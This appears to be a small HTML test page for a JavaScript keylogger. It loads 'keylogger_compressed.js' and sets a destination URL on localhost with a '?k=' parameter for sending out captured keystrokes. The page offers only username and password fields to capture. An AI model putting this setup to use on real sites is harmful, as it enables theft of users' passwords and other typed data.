﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <script type="text/javascript" src="keylogger_compressed.js"></script>
    <script type="text/javascript">
        destination = 'http://localhost:5230/?k=';
    </script>
    <title>Test 1</title>
</head>
<body>
    <input id="username" />
    <br />
    <input id="password" type="password" />    
</body>
</html>
